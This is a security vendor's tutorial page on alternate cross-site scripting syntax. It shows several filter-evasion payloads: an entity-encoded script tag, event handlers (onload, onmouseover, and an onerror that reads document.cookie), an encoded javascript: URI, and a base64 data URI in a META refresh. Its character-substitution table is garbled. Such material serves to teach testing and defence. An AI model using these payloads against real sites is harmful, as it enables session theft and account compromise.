Support
Articles and Tutorials
Policy
FAQ
Glossary
Products
Sax2 NIDS
Sax2 Screenshots
Buy Now
White Papers
Awards
Download
Contact Us

Consulting:

Technical Support:

Sales:

General Information:

 
 

Alternate XSS Syntax
 

Description

Cross Site Scripting is not just <script>alert('y0u ar3 0wn3d!');</script>. Because of JavaScript and HTML flexibility and their interpretation by the web browsers, it's possible to achive the same goal in many different ways. In effect we may try to bypass more or less successful input data filtering methods. Conducting a ssuccessfull attack depeneds on the web browsers used by the attacker (when he's building XSS) and the victim.

Some JS and HTML constructions after encoding are correctly interpreted by some browsers, nontheless it often varies on the web browser version, and others are not.

If we want to use popular <script> tags anyway, we may try to bypass filtering replacing given characters with their equivalents: 

From To

<    <

> >  >

(    (

)    )

#    #

&    &

"    "

In this case: 

 <script>alert('y0u ar3 0wn3d!');</script>

would be replaced with: 

&\lt;script&\gt;alert&\#40;'y0u ar3 0wn3d!'&\#41;;&\lt;/script&\gt;

However there are browsers which will automatically reverse the process and interpret this string correctly.

We don't need to do replacement at all, we may get the same effect in many different ways.

Examples

Example 1 (XSS using Script in Attributes)


XSS attacks may be conducted without using <script></script> tags. Other tags will do exacly the same thing, e.g.: 

<body onload=alert('test1')>

or other attribites like: onmouseover, onerror.

onmouseover 

<b onmouseover=alert('Wufff!')>click me!</b>

onerror 

<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>


Example 2 (XSS using Script Via Encoded URI Schemes)

If we need to hide against web application filters we may try to encode string characters, e.g.: a=&#X41 (UTF-8) and use it in IMG tag: 

<IMG SRC=j&#X41vascript:alert('test2')>

There are many different UTF-8 encoding notations what give us even more possibilities.


Example 3 (XSS using code encoding)


We may encode our script in base64 and place it in META tag. This way we get rid of alert() totally. More information about this method can be found in RFC 2397 

<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">

These (just a little modified by me) and others examples can be found on http://ha.ckers.org/xss.html, which is a true encyclopedia of the alternate XSS syntax attack.